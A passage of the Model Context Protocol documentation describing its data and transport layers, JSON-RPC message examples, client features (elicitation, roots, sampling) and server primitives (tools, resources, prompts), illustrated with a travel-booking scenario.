* **Transport layer**: Defines the communication mechanisms and channels that enable data exchange between clients and servers, including transport-specific connection establishment, message framing, and authorization.
Conceptually the data layer is the inner layer, while the transport layer is the outer layer.
#### Data layer
The data layer implements a [JSON-RPC 2.0](https://www.jsonrpc.org/) based exchange protocol that defines the message structure and semantics.
This layer includes:
* **Lifecycle management**: Handles connection initialization, capability negotiation, and connection termination between clients and servers
* **Server features**: Enables servers to provide core functionality including tools for AI actions, resources for context data, and prompts for interaction templates from and to the client
* **Client features**: Enables servers to ask the client to sample from the host LLM, elicit input from the user, and log messages to the client
* **Utility features**: Supports additional capabilities like notifications for real-time updates and progress tracking for long-running operations
#### Transport layer
The transport layer manages communication channels and authentication between clients and servers. It handles connection establishment, message framing, and secure communication between MCP participants.
MCP supports two transport mechanisms:
* **Stdio transport**: Uses standard input/output streams for direct process communication between local processes on the same machine, providing optimal performance with no network overhead.
* **Streamable HTTP transport**: Uses HTTP POST for client-to-server messages with optional Server-Sent Events for streaming capabilities. This transport enables remote server communication and supports standard HTTP authentication methods including bearer tokens, API keys, and custom headers. MCP recommends using OAuth to obtain authentication tokens.
The transport layer abstracts communication details from the protocol layer, enabling the same JSON-RPC 2.0 message format across all transport mechanisms.
### Data Layer Protocol
A core part of MCP is defining the schema and semantics between MCP clients and MCP servers. Developers will likely find the data layer — in particular, the set of [primitives](#primitives) — to be the most interesting part of MCP. It is the part of MCP that defines the ways developers can share context from MCP servers to MCP clients.
MCP uses [JSON-RPC 2.0](https://www.jsonrpc.org/) as its underlying RPC protocol. Client and servers send requests to each other and respond accordingly. Notifications can be used when no response is required.
#### Lifecycle management
MCP is a stateful protocol that requires lifecycle management. The purpose of lifecycle management is to negotiate the capabilities that both client and server support. Detailed information can be found in the [specification](/specification/latest/basic/lifecycle), and the [example](#example) showcases the initialization sequence.
#### Primitives
MCP primitives are the most important concept within MCP. They define what clients and servers can offer each other. These primitives specify the types of contextual information that can be shared with AI applications and the range of actions that can be performed.
MCP defines three core primitives that *servers* can expose:
* **Tools**: Executable functions that AI applications can invoke to perform actions (e.g., file operations, API calls, database queries)
* **Resources**: Data sources that provide contextual information to AI applications (e.g., file contents, database records, API responses)
* **Prompts**: Reusable templates that help structure interactions with language models (e.g., system prompts, few-shot examples)
Each primitive type has associated methods for discovery (`*/list`), retrieval (`*/get`), and in some cases, execution (`tools/call`).
MCP clients will use the `*/list` methods to discover available primitives. For example, a client can first list all available tools (`tools/list`) and then execute them. This design allows listings to be dynamic.
As a concrete example, consider an MCP server that provides context about a database. It can expose tools for querying the database, a resource that contains the schema of the database, and a prompt that includes few-shot examples for interacting with the tools.
For more details about server primitives see [server concepts](./server-concepts).
MCP also defines primitives that *clients* can expose. These primitives allow MCP server authors to build richer interactions.
* **Sampling**: Allows servers to request language model completions from the client's AI application. This is useful when servers' authors want access to a language model, but want to stay model independent and not include a language model SDK in their MCP server. They can use the `sampling/complete` method to request a language model completion from the client's AI application.
* **Elicitation**: Allows servers to request additional information from users. This is useful when servers' authors want to get more information from the user, or ask for confirmation of an action. They can use the `elicitation/request` method to request additional information from the user.
* **Logging**: Enables servers to send log messages to clients for debugging and monitoring purposes.
For more details about client primitives see [client concepts](./client-concepts).
Besides server and client primitives, the protocol offers cross-cutting utility primitives that augment how requests are executed:
* **Tasks (Experimental)**: Durable execution wrappers that enable deferred result retrieval and status tracking for MCP requests (e.g., expensive computations, workflow automation, batch processing, multi-step operations)
#### Notifications
The protocol supports real-time notifications to enable dynamic updates between servers and clients. For example, when a server's available tools change—such as when new functionality becomes available or existing tools are modified—the server can send tool update notifications to inform connected clients about these changes. Notifications are sent as JSON-RPC 2.0 notification messages (without expecting a response) and enable MCP servers to provide real-time updates to connected clients.
## Example
### Data Layer
This section provides a step-by-step walkthrough of an MCP client-server interaction, focusing on the data layer protocol. We'll demonstrate the lifecycle sequence, tool operations, and notifications using JSON-RPC 2.0 messages.
MCP begins with lifecycle management through a capability negotiation handshake. As described in the [lifecycle management](#lifecycle-management) section, the client sends an `initialize` request to establish the connection and negotiate supported features.
```json Initialize Request theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-06-18",
"capabilities": {
"elicitation": {}
},
"clientInfo": {
"name": "example-client",
"version": "1.0.0"
}
}
}
```
```json Initialize Response theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {
"listChanged": true
},
"resources": {}
},
"serverInfo": {
"name": "example-server",
"version": "1.0.0"
}
}
}
```
#### Understanding the Initialization Exchange
The initialization process is a key part of MCP's lifecycle management and serves several critical purposes:
1. **Protocol Version Negotiation**: The `protocolVersion` field (e.g., "2025-06-18") ensures both client and server are using compatible protocol versions. This prevents communication errors that could occur when different versions attempt to interact. If a mutually compatible version is not negotiated, the connection should be terminated.
2. **Capability Discovery**: The `capabilities` object allows each party to declare what features they support, including which [primitives](#primitives) they can handle (tools, resources, prompts) and whether they support features like [notifications](#notifications). This enables efficient communication by avoiding unsupported operations.
3. **Identity Exchange**: The `clientInfo` and `serverInfo` objects provide identification and versioning information for debugging and compatibility purposes.
In this example, the capability negotiation demonstrates how MCP primitives are declared:
**Client Capabilities**:
* `"elicitation": {}` - The client declares it can work with user interaction requests (can receive `elicitation/create` method calls)
**Server Capabilities**:
* `"tools": {"listChanged": true}` - The server supports the tools primitive AND can send `tools/list_changed` notifications when its tool list changes
* `"resources": {}` - The server also supports the resources primitive (can handle `resources/list` and `resources/read` methods)
After successful initialization, the client sends a notification to indicate it's ready:
```json Notification theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/initialized"
}
```
#### How This Works in AI Applications
During initialization, the AI application's MCP client manager establishes connections to configured servers and stores their capabilities for later use. The application uses this information to determine which servers can provide specific types of functionality (tools, resources, prompts) and whether they support real-time updates.
```python Pseudo-code for AI application initialization theme={null}
# Pseudo Code
async with stdio_client(server_config) as (read, write):
async with ClientSession(read, write) as session:
init_response = await session.initialize()
if init_response.capabilities.tools:
app.register_mcp_server(session, supports_tools=True)
app.set_server_ready(session)
```
Now that the connection is established, the client can discover available tools by sending a `tools/list` request. This request is fundamental to MCP's tool discovery mechanism — it allows clients to understand what tools are available on the server before attempting to use them.
```json Tools List Request theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/list"
}
```
```json Tools List Response theme={null}
{
"jsonrpc": "2.0",
"id": 2,
"result": {
"tools": [
{
"name": "calculator_arithmetic",
"title": "Calculator",
"description": "Perform mathematical calculations including basic arithmetic, trigonometric functions, and algebraic operations",
"inputSchema": {
"type": "object",
"properties": {
"expression": {
"type": "string",
"description": "Mathematical expression to evaluate (e.g., '2 + 3 * 4', 'sin(30)', 'sqrt(16)')"
}
},
"required": ["expression"]
}
},
{
"name": "weather_current",
"title": "Weather Information",
"description": "Get current weather information for any location worldwide",
"inputSchema": {
"type": "object",
"properties": {
"location": {
"type": "string",
"description": "City name, address, or coordinates (latitude,longitude)"
},
"units": {
"type": "string",
"enum": ["metric", "imperial", "kelvin"],
"description": "Temperature units to use in response",
"default": "metric"
}
},
"required": ["location"]
}
}
]
}
}
```
#### Understanding the Tool Discovery Request
The `tools/list` request is simple, containing no parameters.
#### Understanding the Tool Discovery Response
The response contains a `tools` array that provides comprehensive metadata about each available tool. This array-based structure allows servers to expose multiple tools simultaneously while maintaining clear boundaries between different functionalities.
Each tool object in the response includes several key fields:
* **`name`**: A unique identifier for the tool within the server's namespace. This serves as the primary key for tool execution and should follow a clear naming pattern (e.g., `calculator_arithmetic` rather than just `calculate`)
* **`title`**: A human-readable display name for the tool that clients can show to users
* **`description`**: Detailed explanation of what the tool does and when to use it
* **`inputSchema`**: A JSON Schema that defines the expected input parameters, enabling type validation and providing clear documentation about required and optional parameters
#### How This Works in AI Applications
The AI application fetches available tools from all connected MCP servers and combines them into a unified tool registry that the language model can access. This allows the LLM to understand what actions it can perform and automatically generates the appropriate tool calls during conversations.
```python Pseudo-code for AI application tool discovery theme={null}
# Pseudo-code using MCP Python SDK patterns
available_tools = []
for session in app.mcp_server_sessions():
tools_response = await session.list_tools()
available_tools.extend(tools_response.tools)
conversation.register_available_tools(available_tools)
```
The client can now execute a tool using the `tools/call` method. This demonstrates how MCP primitives are used in practice: after discovering available tools, the client can invoke them with appropriate arguments.
#### Understanding the Tool Execution Request
The `tools/call` request follows a structured format that ensures type safety and clear communication between client and server. Note that we're using the proper tool name from the discovery response (`weather_current`) rather than a simplified name:
```json Tool Call Request theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"method": "tools/call",
"params": {
"name": "weather_current",
"arguments": {
"location": "San Francisco",
"units": "imperial"
}
}
}
```
```json Tool Call Response theme={null}
{
"jsonrpc": "2.0",
"id": 3,
"result": {
"content": [
{
"type": "text",
"text": "Current weather in San Francisco: 68°F, partly cloudy with light winds from the west at 8 mph. Humidity: 65%"
}
]
}
}
```
#### Key Elements of Tool Execution
The request structure includes several important components:
1. **`name`**: Must match exactly the tool name from the discovery response (`weather_current`). This ensures the server can correctly identify which tool to execute.
2. **`arguments`**: Contains the input parameters as defined by the tool's `inputSchema`. In this example:
* `location`: "San Francisco" (required parameter)
* `units`: "imperial" (optional parameter, defaults to "metric" if not specified)
3. **JSON-RPC Structure**: Uses standard JSON-RPC 2.0 format with unique `id` for request-response correlation.
#### Understanding the Tool Execution Response
The response demonstrates MCP's flexible content system:
1. **`content` Array**: Tool responses return an array of content objects, allowing for rich, multi-format responses (text, images, resources, etc.)
2. **Content Types**: Each content object has a `type` field. In this example, `"type": "text"` indicates plain text content, but MCP supports various content types for different use cases.
3. **Structured Output**: The response provides actionable information that the AI application can use as context for language model interactions.
This execution pattern allows AI applications to dynamically invoke server functionality and receive structured responses that can be integrated into conversations with language models.
#### How This Works in AI Applications
When the language model decides to use a tool during a conversation, the AI application intercepts the tool call, routes it to the appropriate MCP server, executes it, and returns the results back to the LLM as part of the conversation flow. This enables the LLM to access real-time data and perform actions in the external world.
```python theme={null}
# Pseudo-code for AI application tool execution
async def handle_tool_call(conversation, tool_name, arguments):
session = app.find_mcp_session_for_tool(tool_name)
result = await session.call_tool(tool_name, arguments)
conversation.add_tool_result(result.content)
```
MCP supports real-time notifications that enable servers to inform clients about changes without being explicitly requested. This demonstrates the notification system, a key feature that keeps MCP connections synchronized and responsive.
#### Understanding Tool List Change Notifications
When the server's available tools change—such as when new functionality becomes available, existing tools are modified, or tools become temporarily unavailable—the server can proactively notify connected clients:
```json Request theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tools/list_changed"
}
```
#### Key Features of MCP Notifications
1. **No Response Required**: Notice there's no `id` field in the notification. This follows JSON-RPC 2.0 notification semantics where no response is expected or sent.
2. **Capability-Based**: This notification is only sent by servers that declared `"listChanged": true` in their tools capability during initialization (as shown in Step 1).
3. **Event-Driven**: The server decides when to send notifications based on internal state changes, making MCP connections dynamic and responsive.
#### Client Response to Notifications
Upon receiving this notification, the client typically reacts by requesting the updated tool list. This creates a refresh cycle that keeps the client's understanding of available tools current:
```json Request theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"method": "tools/list"
}
```
#### Why Notifications Matter
This notification system is crucial for several reasons:
1. **Dynamic Environments**: Tools may come and go based on server state, external dependencies, or user permissions
2. **Efficiency**: Clients don't need to poll for changes; they're notified when updates occur
3. **Consistency**: Ensures clients always have accurate information about available server capabilities
4. **Real-time Collaboration**: Enables responsive AI applications that can adapt to changing contexts
This notification pattern extends beyond tools to other MCP primitives, enabling comprehensive real-time synchronization between clients and servers.
#### How This Works in AI Applications
When the AI application receives a notification about changed tools, it immediately refreshes its tool registry and updates the LLM's available capabilities. This ensures that ongoing conversations always have access to the most current set of tools, and the LLM can dynamically adapt to new functionality as it becomes available.
```python theme={null}
# Pseudo-code for AI application notification handling
async def handle_tools_changed_notification(session):
tools_response = await session.list_tools()
app.update_available_tools(session, tools_response.tools)
if app.conversation.is_active():
app.conversation.notify_llm_of_new_capabilities()
```
# Understanding MCP clients
Source: https://modelcontextprotocol.io/docs/learn/client-concepts
MCP clients are instantiated by host applications to communicate with particular MCP servers. The host application, like Claude.ai or an IDE, manages the overall user experience and coordinates multiple clients. Each client handles one direct communication with one server.
Understanding the distinction is important: the *host* is the application users interact with, while *clients* are the protocol-level components that enable server connections.
## Core Client Features
In addition to making use of context provided by servers, clients may provide several features to servers. These client features allow server authors to build richer interactions.
| Feature | Explanation | Example |
| --------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| **Elicitation** | Elicitation enables servers to request specific information from users during interactions, providing a structured way for servers to gather information on demand. | A server booking travel may ask for the user's preferences on airplane seats, room type or their contact number to finalise a booking. |
| **Roots** | Roots allow clients to specify which directories servers should focus on, communicating intended scope through a coordination mechanism. | A server for booking travel may be given access to a specific directory, from which it can read a user's calendar. |
| **Sampling** | Sampling allows servers to request LLM completions through the client, enabling an agentic workflow. This approach puts the client in complete control of user permissions and security measures. | A server for booking travel may send a list of flights to an LLM and request that the LLM pick the best flight for the user. |
### Elicitation
Elicitation enables servers to request specific information from users during interactions, creating more dynamic and responsive workflows.
#### Overview
Elicitation provides a structured way for servers to gather necessary information on demand. Instead of requiring all information up front or failing when data is missing, servers can pause their operations to request specific inputs from users. This creates more flexible interactions where servers adapt to user needs rather than following rigid patterns.
**Elicitation flow:**
```mermaid theme={null}
sequenceDiagram
participant User
participant Client
participant Server
Note over Server,Client: Server initiates elicitation
Server->>Client: elicitation/create
Note over Client,User: Human interaction
Client->>User: Present elicitation UI
User-->>Client: Provide requested information
Note over Server,Client: Complete request
Client-->>Server: Return user response
Note over Server: Continue processing with new information
```
The flow enables dynamic information gathering. Servers can request specific data when needed, users provide information through appropriate UI, and servers continue processing with the newly acquired context.
**Elicitation components example:**
```typescript theme={null}
{
method: "elicitation/requestInput",
params: {
message: "Please confirm your Barcelona vacation booking details:",
schema: {
type: "object",
properties: {
confirmBooking: {
type: "boolean",
description: "Confirm the booking (Flights + Hotel = $3,000)"
},
seatPreference: {
type: "string",
enum: ["window", "aisle", "no preference"],
description: "Preferred seat type for flights"
},
roomType: {
type: "string",
enum: ["sea view", "city view", "garden view"],
description: "Preferred room type at hotel"
},
travelInsurance: {
type: "boolean",
default: false,
description: "Add travel insurance ($150)"
}
},
required: ["confirmBooking"]
}
}
}
```
#### Example: Holiday Booking Approval
A travel booking server demonstrates elicitation's power through the final booking confirmation process. When a user has selected their ideal vacation package to Barcelona, the server needs to gather final approval and any missing details before proceeding.
The server elicits booking confirmation with a structured request that includes the trip summary (Barcelona flights June 15-22, beachfront hotel, total \$3,000) and fields for any additional preferences—such as seat selection, room type, or travel insurance options.
As the booking progresses, the server elicits contact information needed to complete the reservation. It might ask for traveler details for flight bookings, special requests for the hotel, or emergency contact information.
#### User Interaction Model
Elicitation interactions are designed to be clear, contextual, and respectful of user autonomy:
**Request presentation**: Clients display elicitation requests with clear context about which server is asking, why the information is needed, and how it will be used. The request message explains the purpose while the schema provides structure and validation.
**Response options**: Users can provide the requested information through appropriate UI controls (text fields, dropdowns, checkboxes), decline to provide information with optional explanation, or cancel the entire operation. Clients validate responses against the provided schema before returning them to servers.
**Privacy considerations**: Elicitation never requests passwords or API keys. Clients warn about suspicious requests and let users review data before sending.
### Roots
Roots define filesystem boundaries for server operations, allowing clients to specify which directories servers should focus on.
#### Overview
Roots are a mechanism for clients to communicate filesystem access boundaries to servers. They consist of file URIs that indicate directories where servers can operate, helping servers understand the scope of available files and folders. While roots communicate intended boundaries, they do not enforce security restrictions. Actual security must be enforced at the operating system level, via file permissions and/or sandboxing.
**Root structure:**
```json theme={null}
{
"uri": "file:///Users/agent/travel-planning",
"name": "Travel Planning Workspace"
}
```
Roots are exclusively filesystem paths and always use the `file://` URI scheme. They help servers understand project boundaries, workspace organization, and accessible directories. The roots list can be updated dynamically as users work with different projects or folders, with servers receiving notifications through `roots/list_changed` when boundaries change.
#### Example: Travel Planning Workspace
A travel agent working with multiple client trips benefits from roots to organize filesystem access. Consider a workspace with different directories for various aspects of travel planning.
The client provides filesystem roots to the travel planning server:
* `file:///Users/agent/travel-planning` - Main workspace containing all travel files
* `file:///Users/agent/travel-templates` - Reusable itinerary templates and resources
* `file:///Users/agent/client-documents` - Client passports and travel documents
When the agent creates a Barcelona itinerary, well-behaved servers respect these boundaries—accessing templates, saving the new itinerary, and referencing client documents within the specified roots. Servers typically access files within roots by using relative paths from the root directories or by utilizing file search tools that respect the root boundaries.
If the agent opens an archive folder like `file:///Users/agent/archive/2023-trips`, the client updates the roots list via `roots/list_changed`.
For a complete implementation of a server that respects roots, see the [filesystem server](https://github.com/modelcontextprotocol/servers/tree/main/src/filesystem) in the official servers repository.
#### Design Philosophy
Roots serve as a coordination mechanism between clients and servers, not a security boundary. The specification requires that servers "SHOULD respect root boundaries," and not that they "MUST enforce" them, because servers run code the client cannot control.
Roots work best when servers are trusted or vetted, users understand their advisory nature, and the goal is preventing accidents rather than stopping malicious behavior. They excel at context scoping (telling servers where to focus), accident prevention (helping well-behaved servers stay in bounds), and workflow organization (such as managing project boundaries automatically).
#### User Interaction Model
Roots are typically managed automatically by host applications based on user actions, though some applications may expose manual root management:
**Automatic root detection**: When users open folders, clients automatically expose them as roots. Opening a travel workspace allows the client to expose that directory as a root, helping servers understand which itineraries and documents are in scope for the current work.
**Manual root configuration**: Advanced users can specify roots through configuration. For example, adding `/travel-templates` for reusable resources while excluding directories with financial records.
### Sampling
Sampling allows servers to request language model completions through the client, enabling agentic behaviors while maintaining security and user control.
#### Overview
Sampling enables servers to perform AI-dependent tasks without directly integrating with or paying for AI models. Instead, servers can request that the client—which already has AI model access—handle these tasks on their behalf. This approach puts the client in complete control of user permissions and security measures. Because sampling requests occur within the context of other operations—like a tool analyzing data—and are processed as separate model calls, they maintain clear boundaries between different contexts, allowing for more efficient use of the context window.
**Sampling flow:**
```mermaid theme={null}
sequenceDiagram
participant LLM
participant User
participant Client
participant Server
Note over Server,Client: Server initiates sampling
Server->>Client: sampling/createMessage
Note over Client,User: Human-in-the-loop review
Client->>User: Present request for approval
User-->>Client: Review and approve/modify
Note over Client,LLM: Model interaction
Client->>LLM: Forward approved request
LLM-->>Client: Return generation
Note over Client,User: Response review
Client->>User: Present response for approval
User-->>Client: Review and approve/modify
Note over Server,Client: Complete request
Client-->>Server: Return approved response
```
The flow ensures security through multiple human-in-the-loop checkpoints. Users review and can modify both the initial request and the generated response before it returns to the server.
**Request parameters example:**
```typescript theme={null}
{
messages: [
{
role: "user",
content: "Analyze these flight options and recommend the best choice:\n" +
"[47 flights with prices, times, airlines, and layovers]\n" +
"User preferences: morning departure, max 1 layover"
}
],
modelPreferences: {
hints: [{
name: "claude-sonnet-4-20250514" // Suggested model
}],
costPriority: 0.3, // Less concerned about API cost
speedPriority: 0.2, // Can wait for thorough analysis
intelligencePriority: 0.9 // Need complex trade-off evaluation
},
systemPrompt: "You are a travel expert helping users find the best flights based on their preferences",
maxTokens: 1500
}
```
#### Example: Flight Analysis Tool
Consider a travel booking server with a tool called `findBestFlight` that uses sampling to analyze available flights and recommend the optimal choice. When a user asks "Book me the best flight to Barcelona next month," the tool needs AI assistance to evaluate complex trade-offs.
The tool queries airline APIs and gathers 47 flight options. It then requests AI assistance to analyze these options: "Analyze these flight options and recommend the best choice: \[47 flights with prices, times, airlines, and layovers] User preferences: morning departure, max 1 layover."
The client initiates the sampling request, allowing the AI to evaluate trade-offs—like cheaper red-eye flights versus convenient morning departures. The tool uses this analysis to present the top three recommendations.
#### User Interaction Model
While not a requirement, sampling is designed to allow human-in-the-loop control. Users can maintain oversight through several mechanisms:
**Approval controls**: Sampling requests may require explicit user consent. Clients can show what the server wants to analyze and why. Users can approve, deny, or modify requests.
**Transparency features**: Clients can display the exact prompt, model selection, and token limits, allowing users to review AI responses before they return to the server.
**Configuration options**: Users can set model preferences, configure auto-approval for trusted operations, or require approval for everything. Clients may provide options to redact sensitive information.
**Security considerations**: Both clients and servers must handle sensitive data appropriately during sampling. Clients should implement rate limiting and validate all message content. The human-in-the-loop design ensures that server-initiated AI interactions cannot compromise security or access sensitive data without explicit user consent.
# Understanding MCP servers
Source: https://modelcontextprotocol.io/docs/learn/server-concepts
MCP servers are programs that expose specific capabilities to AI applications through standardized protocol interfaces.
Common examples include file system servers for document access, database servers for data queries, GitHub servers for code management, Slack servers for team communication, and calendar servers for scheduling.
## Core Server Features
Servers provide functionality through three building blocks:
| Feature | Explanation | Examples | Who controls it |
| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------ | --------------- |
| **Tools** | Functions that your LLM can actively call, and decides when to use them based on user requests. Tools can write to databases, call external APIs, modify files, or trigger other logic. | Search flights Send messages Create calendar events | Model |
| **Resources** | Passive data sources that provide read-only access to information for context, such as file contents, database schemas, or API documentation. | Retrieve documents Access knowledge bases Read calendars | Application |
| **Prompts** | Pre-built instruction templates that tell the model to work with specific tools and resources. | Plan a vacation Summarize my meetings Draft an email | User |
We will use a hypothetical scenario to demonstrate the role of each of these features, and show how they can work together.
### Tools
Tools enable AI models to perform actions. Each tool defines a specific operation with typed inputs and outputs. The model requests tool execution based on context.
#### How Tools Work
Tools are schema-defined interfaces that LLMs can invoke. MCP uses JSON Schema for validation. Each tool performs a single operation with clearly defined inputs and outputs. Tools may require user consent prior to execution, helping to ensure users maintain control over actions taken by a model.
**Protocol operations:**
| Method | Purpose | Returns |
| ------------ | ------------------------ | -------------------------------------- |
| `tools/list` | Discover available tools | Array of tool definitions with schemas |
| `tools/call` | Execute a specific tool | Tool execution result |
**Example tool definition:**
```typescript theme={null}
{
name: "searchFlights",
description: "Search for available flights",
inputSchema: {
type: "object",
properties: {
origin: { type: "string", description: "Departure city" },
destination: { type: "string", description: "Arrival city" },
date: { type: "string", format: "date", description: "Travel date" }
},
required: ["origin", "destination", "date"]
}
}
```
#### Example: Travel Booking
Tools enable AI applications to perform actions on behalf of users. In a travel planning scenario, the AI application might use several tools to help book a vacation:
**Flight Search**
```
searchFlights(origin: "NYC", destination: "Barcelona", date: "2024-06-15")
```
Queries multiple airlines and returns structured flight options.
**Calendar Blocking**
```
createCalendarEvent(title: "Barcelona Trip", startDate: "2024-06-15", endDate: "2024-06-22")
```
Marks the travel dates in the user's calendar.
**Email notification**
```
sendEmail(to: "team@work.com", subject: "Out of Office", body: "...")
```
Sends an automated out-of-office message to colleagues.
#### User Interaction Model
Tools are model-controlled, meaning AI models can discover and invoke them automatically. However, MCP emphasizes human oversight through several mechanisms.
For trust and safety, applications can implement user control through various mechanisms, such as:
* Displaying available tools in the UI, enabling users to define whether a tool should be made available in specific interactions
* Approval dialogs for individual tool executions
* Permission settings for pre-approving certain safe operations
* Activity logs that show all tool executions with their results
### Resources
Resources provide structured access to information that the AI application can retrieve and provide to models as context.
#### How Resources Work
Resources expose data from files, APIs, databases, or any other source that an AI needs to understand context. Applications can access this information directly and decide how to use it - whether that's selecting relevant portions, searching with embeddings, or passing it all to the model.
Each resource has a unique URI (e.g., `file:///path/to/document.md`) and declares its MIME type for appropriate content handling.
Resources support two discovery patterns:
* **Direct Resources** - fixed URIs that point to specific data. Example: `calendar://events/2024` - returns calendar availability for 2024
* **Resource Templates** - dynamic URIs with parameters for flexible queries. Example:
* `travel://activities/{city}/{category}` - returns activities by city and category
* `travel://activities/barcelona/museums` - returns all museums in Barcelona
Resource Templates include metadata such as title, description, and expected MIME type, making them discoverable and self-documenting.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------------------- | ------------------------------- | -------------------------------------- |
| `resources/list` | List available direct resources | Array of resource descriptors |
| `resources/templates/list` | Discover resource templates | Array of resource template definitions |
| `resources/read` | Retrieve resource contents | Resource data with metadata |
| `resources/subscribe` | Monitor resource changes | Subscription confirmation |
#### Example: Getting Travel Planning Context
Continuing with the travel planning example, resources provide the AI application with access to relevant information:
* **Calendar data** (`calendar://events/2024`) - Checks user availability
* **Travel documents** (`file:///Documents/Travel/passport.pdf`) - Accesses important documents
* **Previous itineraries** (`trips://history/barcelona-2023`) - References past trips and preferences
The AI application retrieves these resources and decides how to process them, whether selecting a subset of data using embeddings or keyword search, or passing raw data directly to the model.
In this case, it provides calendar data, weather information, and travel preferences to the model, enabling it to check availability, look up weather patterns, and reference past travel preferences.
**Resource Template Examples:**
```json theme={null}
{
"uriTemplate": "weather://forecast/{city}/{date}",
"name": "weather-forecast",
"title": "Weather Forecast",
"description": "Get weather forecast for any city and date",
"mimeType": "application/json"
}
{
"uriTemplate": "travel://flights/{origin}/{destination}",
"name": "flight-search",
"title": "Flight Search",
"description": "Search available flights between cities",
"mimeType": "application/json"
}
```
These templates enable flexible queries. For weather data, users can access forecasts for any city/date combination. For flights, they can search routes between any two airports. When a user has input "NYC" as the `origin` airport and begins to input "Bar" as the `destination` airport, the system can suggest "Barcelona (BCN)" or "Barbados (BGI)".
#### Parameter Completion
Dynamic resources support parameter completion. For example:
* Typing "Par" as input for `weather://forecast/{city}` might suggest "Paris" or "Park City"
* Typing "JFK" for `flights://search/{airport}` might suggest "JFK - John F. Kennedy International"
The system helps discover valid values without requiring exact format knowledge.
#### User Interaction Model
Resources are application-driven, giving them flexibility in how they retrieve, process, and present available context. Common interaction patterns include:
* Tree or list views for browsing resources in familiar folder-like structures
* Search and filter interfaces for finding specific resources
* Automatic context inclusion or smart suggestions based on heuristics or AI selection
* Manual or bulk selection interfaces for including single or multiple resources
Applications are free to implement resource discovery through any interface pattern that suits their needs. The protocol doesn't mandate specific UI patterns, allowing for resource pickers with preview capabilities, smart suggestions based on current conversation context, bulk selection for including multiple resources, or integration with existing file browsers and data explorers.
### Prompts
Prompts provide reusable templates. They allow MCP server authors to provide parameterized prompts for a domain, or showcase how to best use the MCP server.
#### How Prompts Work
Prompts are structured templates that define expected inputs and interaction patterns. They are user-controlled, requiring explicit invocation rather than automatic triggering. Prompts can be context-aware, referencing available resources and tools to create comprehensive workflows. Similar to resources, prompts support parameter completion to help users discover valid argument values.
**Protocol operations:**
| Method | Purpose | Returns |
| -------------- | -------------------------- | ------------------------------------- |
| `prompts/list` | Discover available prompts | Array of prompt descriptors |
| `prompts/get` | Retrieve prompt details | Full prompt definition with arguments |
#### Example: Streamlined Workflows
Prompts provide structured templates for common tasks. In the travel planning context:
**"Plan a vacation" prompt:**
```json theme={null}
{
"name": "plan-vacation",
"title": "Plan a vacation",
"description": "Guide through vacation planning process",
"arguments": [
{ "name": "destination", "type": "string", "required": true },
{ "name": "duration", "type": "number", "description": "days" },
{ "name": "budget", "type": "number", "required": false },
{ "name": "interests", "type": "array", "items": { "type": "string" } }
]
}
```
Rather than unstructured natural language input, the prompt system enables:
1. Selection of the "Plan a vacation" template
2. Structured input: Barcelona, 7 days, \$3000, \["beaches", "architecture", "food"]
3. Consistent workflow execution based on the template
#### User Interaction Model
Prompts are user-controlled, requiring explicit invocation. The protocol gives implementers freedom to design interfaces that feel natural within their application. Key principles include:
* Easy discovery of available prompts
* Clear descriptions of what each prompt does
* Natural argument input with validation
* Transparent display of the prompt's underlying template
Applications typically expose prompts through various UI patterns such as:
* Slash commands (typing "/" to see available prompts like /plan-vacation)
* Command palettes for searchable access
* Dedicated UI buttons for frequently used prompts
* Context menus that suggest relevant prompts
## Bringing Servers Together
The real power of MCP emerges when multiple servers work together, combining their specialized capabilities through a unified interface.
### Example: Multi-Server Travel Planning
Consider a personalized AI travel planner application, with three connected servers:
* **Travel Server** - Handles flights, hotels, and itineraries
* **Weather Server** - Provides climate data and forecasts
* **Calendar/Email Server** - Manages schedules and communications
#### The Complete Flow
1. **User invokes a prompt with parameters:**
```json theme={null}
{
"prompt": "plan-vacation",
"arguments": {
"destination": "Barcelona",
"departure_date": "2024-06-15",
"return_date": "2024-06-22",
"budget": 3000,
"travelers": 2
}
}
```
2. **User selects resources to include:**
* `calendar://my-calendar/June-2024` (from Calendar Server)
* `travel://preferences/europe` (from Travel Server)
* `travel://past-trips/Spain-2023` (from Travel Server)
3. **AI processes the request using tools:**
The AI first reads all selected resources to gather context - identifying available dates from the calendar, learning preferred airlines and hotel types from travel preferences, and discovering previously enjoyed locations from past trips.
Using this context, the AI then executes a series of Tools:
* `searchFlights()` - Queries airlines for NYC to Barcelona flights
* `checkWeather()` - Retrieves climate forecasts for travel dates
The AI then uses this information to create the booking and following steps, requesting approval from the user where necessary:
* `bookHotel()` - Finds hotels within the specified budget
* `createCalendarEvent()` - Adds the trip to the user's calendar
* `sendEmail()` - Sends confirmation with trip details
**The result:** Through multiple MCP servers, the user researched and booked a Barcelona trip tailored to their schedule. The "Plan a Vacation" prompt guided the AI to combine Resources (calendar availability and travel history) with Tools (searching flights, booking hotels, updating calendars) across different servers—gathering context and executing the booking. A task that could've taken hours was completed in minutes using MCP.
# SDKs
Source: https://modelcontextprotocol.io/docs/sdk
Official SDKs for building with Model Context Protocol
Build MCP servers and clients using our official SDKs. All SDKs provide the same core functionality and full protocol support.
## Available SDKs
## Getting Started
Each SDK provides the same functionality but follows the idioms and best practices of its language. All SDKs support:
* Creating MCP servers that expose tools, resources, and prompts
* Building MCP clients that can connect to any MCP server
* Local and remote transport protocols
* Protocol compliance with type safety
Visit the SDK page for your chosen language to find installation instructions, documentation, and examples.
## Next Steps
Ready to start building with MCP? Choose your path:
Learn how to create your first MCP server
Create applications that connect to MCP servers
# MCP Inspector
Source: https://modelcontextprotocol.io/docs/tools/inspector
In-depth guide to using the MCP Inspector for testing and debugging Model Context Protocol servers
